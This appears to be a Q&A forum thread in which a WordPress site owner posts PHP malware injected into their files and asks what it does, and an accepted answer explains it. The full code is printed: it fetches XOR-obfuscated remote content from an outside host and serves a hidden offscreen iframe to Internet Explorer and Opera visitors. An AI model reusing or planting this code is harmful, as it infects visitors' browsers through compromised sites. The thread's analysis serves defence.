# What this Code Is Doing? eval(gzinflate(base64_decode Hack

Tags: php, file, external

Can anyone explain what this code is exactly doing? Seems like a hacker has added this to each of my php files over wordpress installation. I understand that it is opening a connection and downloading a file from that url. Anything else?

```
if (!defined('frmDs')){
    define('frmDs' ,1);

    function frm_dl ($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $out = curl_exec ($ch);
            if (curl_errno($ch) !== 0) $out = false;
            curl_close ($ch);
        } else {$out = file_get_contents($url);}
        return trim($out);
    }

    function frm_crpt($in){
        $il=strlen($in);$o='';
        for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
        return $o;
    }

    function frm_getfrm()
    {
        $defframe = '<style>.blqrgw { position:absolute; left:-1117px; top:-1046px; }</style> <div class="blqrgw"><iframe src="http://kchergnrxp.myfw.us/jquery/get.php?ver=jquery.latest.js" width="371" height="426"></iframe></div>'; //default frame
        $codelink = 'http://kchergnrxp.myfw.us/nc/gnc.php?ver=jquery.latest.js';
        if (!$codelink){
            return $defframe;
        }

        $dr='/var/tmp';
        $f = $dr.'/sess_'.md5('frm_frame');
        if(!file_exists($f) || time() - filemtime($f) > 60*5)
        {
            $dlc = frm_dl($codelink);
            if ($dlc){
                if ($fp = @fopen($f, 'w')){
                    fwrite($fp, frm_crpt($dlc));
                    fclose($fp);
                }
                else
                    return $dlc;
            }
            else
                @unlink($f);
        }
        $fc = @file_get_contents($f);
        return ($fc)?frm_crpt($fc):$defframe;
    }

    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) ){
        error_reporting(0);

        if(!isset($_COOKIE['__utmfr']) && $nfc=frm_getfrm() ) {
            @setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');
            print($nfc);
        }
    }
}
```

Comment: invariably this kind of crap installs a 'remote shell' so someone can execute arbitrary commands on your server. You've been hacked, and you've got a LOT of cleanup work to do, including security your site.

Comment: *"Anything else?"* - How is this a concrete programming question?

Comment: @M8R-1jmw5r: it's not. which is why this'll be closed

Comment: It is a code to take over the world - when the cookie limit reaches the threshold then **KA-BOOM**!!! A new ice age will blanket the earth and those who survived will live in the scraps of a lost civilization remembering the warmth of the golden days..

Comment: @MarcB: I hope so I do not have any flags left to get moderator attention.

Answer (score 4, accepted):

```
if (!defined('frmDs')){
define('frmDs' ,1);
```

This check if the frmDs variable exists, I think to prevent the script to be executed twice (it would give an error if you define the same functions twice).

After the functions definitions, the first block of code that is executed is
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) ){
        error_reporting(0);

```
    if(!isset($_COOKIE['__utmfr']) && $nfc=frm_getfrm() ) {
        @setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');
        print($nfc);
    }
}
```

In the block of code above, it checks if the user has the cookie __utmfr, if not this is set and the result of frm_getfrm() is printed to the web output.

In other words, if the user is visiting the site for the first time, he get the result of frm_getfrm() at the beginning of his HTML page.

The functon frm_getfrm() is complicate, but at the end of the day it try to return an hidden IFRAME with the content from the external website http://kchergnrxp.myfw.us/nc/gnc.php?ver=jquery.latest.js *in the case your hosting server can't connect to an external server*.
If your server can connect to an external server, the script use the PHP builtin function to download the content of http://kchergnrxp.myfw.us/nc/gnc.php?ver=jquery.latest.js and returns it.